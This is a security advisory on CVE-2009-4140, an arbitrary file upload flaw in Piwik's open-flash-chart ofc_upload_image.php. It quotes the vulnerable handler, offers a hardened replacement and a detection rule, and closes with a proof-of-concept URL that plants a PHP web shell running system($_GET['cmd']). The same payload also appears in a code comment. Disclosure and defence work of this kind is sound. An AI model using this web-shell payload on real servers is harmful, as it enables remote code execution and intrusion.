BUGTRAQ ID: 37314
CVE(CAN) ID: CVE-2009-4140
Piwik is an open-source web analytics system built with PHP and MySQL.
Piwik uses the open-flash-chart module to render charts. That module does not properly sanitise the name and HTTP_RAW_POST_DATA parameters passed to ofc_upload_image.php before using them to create a file:
<?php
$default_path = '…/tmp-upload-images/'; // path as printed in the advisory
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
$destination = $default_path . basename( $_GET[ 'name' ] ); // This should be sanitised before use: basename() keeps the extension, so name=shell.php yields a .php file.
echo 'Saving your image to: '. $destination; // and it tells us where it's saving it to, sigh.
$jfh = fopen($destination, 'w') or die("can't open file"); // The vulnerable code is right here.
fwrite($jfh, $HTTP_RAW_POST_DATA); // and here: with register_globals on, HTTP_RAW_POST_DATA can be set from the query string, e.g. <?phpinfo();?>, <?system($_GET['cmd']);?>
fclose($jfh);
?>
When register_globals is enabled, an authenticated remote attacker can upload a file with a PHP extension and then access it by requesting tmp-upload-images/ directly, resulting in arbitrary code execution.
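For contrast, here is a hardened replacement for the handler above. This is an added example, not code from Piwik or the open-flash-chart project; the constants UPLOAD_DIR and MAX_BYTES and the function save_chart_image() are this example's own names, and the storage path is an assumption. The three fixes it makes are the ones the advisory's comments point at: the client-supplied name is never used (the server picks a random name with a fixed .png extension), the body is read from php://input instead of the register_globals-exposed HTTP_RAW_POST_DATA and is checked to actually be a PNG, and the filesystem path is never echoed back.

```php
<?php
// Added example (not Piwik's or open-flash-chart's code): a hardened
// replacement for ofc_upload_image.php. UPLOAD_DIR, MAX_BYTES and
// save_chart_image() are this example's own names; the path is assumed.
declare(strict_types=1);

// Store uploads outside the web root so nothing written here can be
// requested as a URL, let alone executed as a script. Assumed path.
const UPLOAD_DIR = '/var/lib/piwik-ofc-uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

/**
 * Save a chart image posted as the raw request body.
 * Returns the server-chosen filename on success, or null on rejection.
 */
function save_chart_image(string $body): ?string
{
    // Do not rely on $HTTP_RAW_POST_DATA / register_globals: the caller
    // reads the body directly from php://input and passes it in.
    if ($body === '' || strlen($body) > MAX_BYTES) {
        return null;
    }
    // Accept only a genuine PNG: check the magic bytes, then make sure the
    // data really decodes as a PNG image rather than as text with a PNG prefix.
    if (substr($body, 0, 8) !== "\x89PNG\r\n\x1a\n") {
        return null;
    }
    $info = @getimagesizefromstring($body);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        return null;
    }
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        return null;
    }
    // The client's "name" parameter is ignored entirely. The server picks a
    // random name with a fixed extension, so no .php file can ever be created
    // and no directory traversal is possible.
    $name = bin2hex(random_bytes(16)) . '.png';
    $dest = UPLOAD_DIR . '/' . $name;
    if (file_put_contents($dest, $body, LOCK_EX) === false) {
        return null;
    }
    chmod($dest, 0640);
    return $name;
}

$saved = save_chart_image((string) file_get_contents('php://input'));
if ($saved === null) {
    http_response_code(400);
    echo 'Upload rejected';
} else {
    // Return only an opaque handle; never disclose the filesystem path.
    echo 'Saved as ' . htmlspecialchars($saved, ENT_QUOTES, 'UTF-8');
}
```

Even with this handler in place, the advisory's proof of concept is worth a detection rule: a request to ofc_upload_image.php whose query string carries a name ending in .php or a HTTP_RAW_POST_DATA parameter has no legitimate reason to exist and should be alerted on.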
Affected versions: Piwik 0.2.35 - 0.4.3
Vendor patch:
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:
http://piwik.org/blog/2009/10/piwik-response-to-secunia-advisory-sa37078/
Proof of concept as published in the advisory:
./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>